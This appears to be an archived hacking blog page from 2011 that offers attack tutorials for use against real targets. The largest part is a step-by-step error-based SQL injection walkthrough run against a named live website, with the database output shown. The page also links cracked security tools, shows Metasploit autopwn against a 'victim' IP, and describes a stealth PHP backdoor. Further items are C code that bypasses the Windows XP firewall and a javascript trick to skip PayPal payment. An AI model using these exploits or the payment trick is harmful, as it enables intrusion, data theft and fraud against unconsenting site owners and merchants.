Home » Archives for June 2011
Acunetix Ver 7.0 Cracked Working and UPDATEABLE
But only use in Vmware because i am not 100 % sure if it is clean ...
Thanks...
Download Info

Pangolin Professional working Tested
also please use only in vmware because i am not sure if it is 100 % clean .

Rce,Lfi,Rfi,Sqli scanner Darkjumper v5.8
Here are some key features of "Darkjumper":
·Scan sql injection, rfi, lfi, blind sql injection
· Autosql injector
· Proxy support
· Verbocity
· Autoftp bruteforcer
· IP or Proxy checker and GeoIP
Requirements:
· Python
Screenshot:
Download link: http://mac.softpedia.com/get/Security/Darkjumper.shtml

How to get IP address of another computer remotely
Hello friends, today i will explain you how to get IP address of any computer remotely. Using some very basic tricks we can find the IP address of any remote computer and then you can start your further hacking into the remote system like port scanning and finding vulnerabilities to enter in to the system and hack it. There are several methods to get an IP address of the victim but i will share few and specially the best one's that can tell you IP address in just few clicks and also all are free methods and special thing is about it is all are manual methods that means you did not require any tool.
![]() |
How to find or get Ip address of somebody else remotely |
How to Find IP address of another computer?
- Compose your email just like you usually would in your own email or web email program
- Type: .readnotify.com on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: [email protected].readnotify.
com - Send your email
- don't send to and from the same computer
- if your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
- if you are cc-ing your email to other readers, you must add tracking to all of them
Now you have IP address but what you can do with an IP address. Ahhaah everything, that i will explain in my next article.

[Video Tut]Local Password Cracking[Noob Friendly]

Local Password Cracking

[Video tut]Tripple Boot ! [Noob Friendly]


Hacking with Nmap and Metasploit
Today I am writing a tutorial on hacking with Nmap with Metasploit.
First d/l Metasploit 3.3 from the official website,Link:
http://www.metasploit.com/
Let all that install, and towards the end of the installation it will ask if you would like Nmap installed also, choose yes. Once you have that installed the Metasploit screen will open up as shown below...
Now type db_create
Once you have typed that type nmap
This loads nmap, as shown below....
You need to configure your scan now, I usually do a simple -sT -sV scan which will tell us the open ports and services running on the victims computer, Now type nmap -sT -sV xxx.xxx.xxx.x (X's being victims Ip number), Demonstrated below.
Now give it 5 minutes to complete the scan,Once that is complete if your lucky you should get a response like this...
This is basically a list of the open ports and services running on the target machine, Now the handy feature of the metasploit 3.3 framework is the autopwn feature, this basically searches and runs all matching exploits in the Metasploit database against the target machine and if successful will create a shell or similar privilege for the attacker.
Now once you have the nmap results delivered back to you showing the open ports and services type db_autopwn -p -t -e , From this point you will either have access to the victims computer through a successfully launched exploit or you will get a response saying the machine wasn't vulnerable to any of the exploits in the Metasploit database. Unfortunately on this particular machine I found it wasn't vulnerable as the image below proves.Good luck.

How To Combine Your Files Into Any Section [Video Tutorial]
Ok Dude i Posted Video Tutorial On How to Combine Your Files Into Any File Extentions.!
Downloads :

A Stealth Tiny PHP Backdoor! weevely
- Coded requests: Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review.
- PHP security bypass: The program try to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server.
- Tiny server: The backdoor server code is small and easily hideable in other PHP files. The core is dinamically cripted, aim to bypass pattern matching controls.
- Modularity: Is simple to increment backdoor server feature with modules, injecting PHP code through the backdoor to implement new functionality on remote server. Code and load new modules is really easy. Current additional modules are: check safe mode, read file, download file on remote server, search writable path .

Postgre Error based sqli Tutorial
money, and dates.
Lets start to play with Postgre:
1st Step find the vulnerability:
http://www.creatop.com.cn/index.cfm?MenuID=80'
ERROR: syntax error at or near "''"
its mean this website can be injected.remember errors can varies you wont get the same error every time.
2nd Step Columns count:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--
get valid page
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--
Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.
Lets try UNION SELECT query:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--
Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched
Seems like UNION SELECT query is not working !!!
Lets try Errorbased Postgre SQLi…
3rd Step:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--
ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"
As we can see we got version of postgre DB server in the form of error.
Lets move on and find database name.
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "scoutsqld"
Scoutsqld is 1st database name you can variey offset to get other databases names.
scoutsqld is first database we can get others by changing offset :)
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is 2nd database so you can increase offset till you got error.
Lets find out the user:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "postgres"
postgres is the user :)
Lets find the tables :>
4th step:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "pg_type"
pg_type is first table we can get others by changing offset :)
5th step:
Now we have to find the columns from our specific table !!!
e.g
our table is action
for that we have to use oracle char conversion.
Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)
so our query is :
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: " typname "
And further you can find the columns using offset..
Last step:
Now we have to extract data from our column .
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "bool"

[Video tut]Sqli injection Details Tutorial [Noob Friendly]

Download

[Vid Tut]DVD BackTrack 4 Fully Professional Training Tutorial [ Noob Friendly]
Download :
http://www.filesonic.com/file/1160797501
http://www.filesonic.com/file/1160817281
http://www.filesonic.com/file/1160822361
http://www.filesonic.com/file/1160822351
http://www.filesonic.com/file/1160797461
http://www.filesonic.com/file/1160778361
http://www.filesonic.com/file/1160797481
http://www.filesonic.com/file/1160778351

[Video Tut] Basics of Trojans

Download
Linkhttp://www.filesonic.com/folder/6382471:

[Video Tut] WEP Cracking

Download:

[Video Tutorial] Detailed Tutorial How To Hack Website With XSS


How does Antivirus software works or detects virus
Dictionary based continuous and fragmented string Search:
Suspicious activity detection:

How to Bypass Windows XP Firewall
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.
* Microsoft Windows XP SP2
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Source Code :-
#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

All Hacking Tutorials By Mr.Mindfreak
Folder link:
http://www.fileserve.com/list/qKUBhap
Free Paypal "buy now" [Exploit]
http://livewebbanners.com/learn.shtml
or
http://www.tallentagency.com/YouTubeClone/index.htm
How to use it:
Copy the code (Below)
Go to the page that you'r doing it on
Paste the link you copied into the URL and it should start.
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);
Hope this really help's you and you save a bit off $ $
Another tip:
To find these site's Google - "this order button requires a javascript enabled browser"
Type that in the "quotes" into google.

BT4 Assuring Security by Penetration Testing
If you are working in the “information security” field, you must know the BackTrack distribution (otherwise you must be an alien coming from a far away planet!). If you search for the word “backtrack” on Amazon, you will find lot of references but only one book is fully dedicated to the Linux distribution: “BackTrack 4: Assuring Security by Penetration Testing“. I received a copy directly from the publisher and here is my review.
- Target scoping
- Information gathering
- Target discovery
- Enumerating target
- Vulnerability mapping
- Social engineering
- Target exploitation
- Privilege escalation
- Maintaining access
- Documentation and reporting
So, who’s need this book? The author’s goal is certainly not to give recipes on “how to hack a website“. The book must been see as a reference for those who already know the BackTrack distribution or who want to learn it. Don’t forget: this is just a toolbox, it does not prevent you to use your brain!
More information about the book here.
Regards
Adnan Anjum.

Make Your Computer Login Screen Like FBI Tunnel
Information:
The first option is a lot easier. About 30 cool screens are available on the WinCustomize site, and the program can randomly select one on every boot. Editing is less straightforward. You build or modify logon screens by tweaking parameters on a lengthy list of elements. So you might, for instance, change the FirstColor parameter of the Centre Panel element to a new shade of blue. This allows you to customize everything from background to letterings to buttons, but beginners will find the process quite confusing. The sketchy online help isn't much assistance, either.
